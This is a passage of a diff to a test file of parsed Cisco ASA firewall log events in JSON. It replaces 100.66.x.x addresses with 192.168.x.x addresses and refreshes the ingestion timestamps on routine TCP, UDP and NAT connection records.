CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111841971Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:31:36.363901600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111843694Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:31:36.363906700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111845342Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:31:36.363910500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111847012Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:31:36.363915300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111848640Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:31:36.363920Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111850268Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363925300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111851948Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:31:36.363929500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111853547Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:31:36.363934Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111855207Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:31:36.363937900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111856794Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363942900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111858454Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:31:36.363948Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111860078Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:31:36.363952200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111861690Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:31:36.363957400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + "mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111863300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", + "ingested": "2021-12-09T13:31:36.363963500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111865046Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:31:36.363968800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111866653Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363973500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111868253Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:31:36.363978300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111869836Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:31:36.363983900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" @@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111871482Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:31:36.363987700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-07-19T09:06:02.111875722Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:31:36.363992800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", @@ -12415,8 +12415,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111877388Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364016400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -12446,8 +12446,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12482,7 +12482,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12491,8 +12491,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111878979Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364022800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12508,7 +12508,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11820", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12530,8 +12530,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12566,7 +12566,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12575,8 +12575,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111880620Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364050600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12592,7 +12592,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.162.30", + "mapped_source_ip": "192.168.162.30", "connection_id": "11821", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12614,8 +12614,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12650,7 +12650,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12660,8 +12660,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111882278Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", + "ingested": "2021-12-09T13:31:36.364054500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12698,8 +12698,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12734,7 +12734,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12743,8 +12743,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111883925Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364058800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12760,7 +12760,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11822", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12782,8 +12782,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12818,7 +12818,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12828,8 +12828,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111885689Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", + "ingested": "2021-12-09T13:31:36.364063900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12866,8 +12866,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12902,7 +12902,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12912,8 +12912,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111919526Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:31:36.364068200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12950,8 +12950,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -12986,7 +12986,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -12995,8 +12995,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111923483Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364073300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 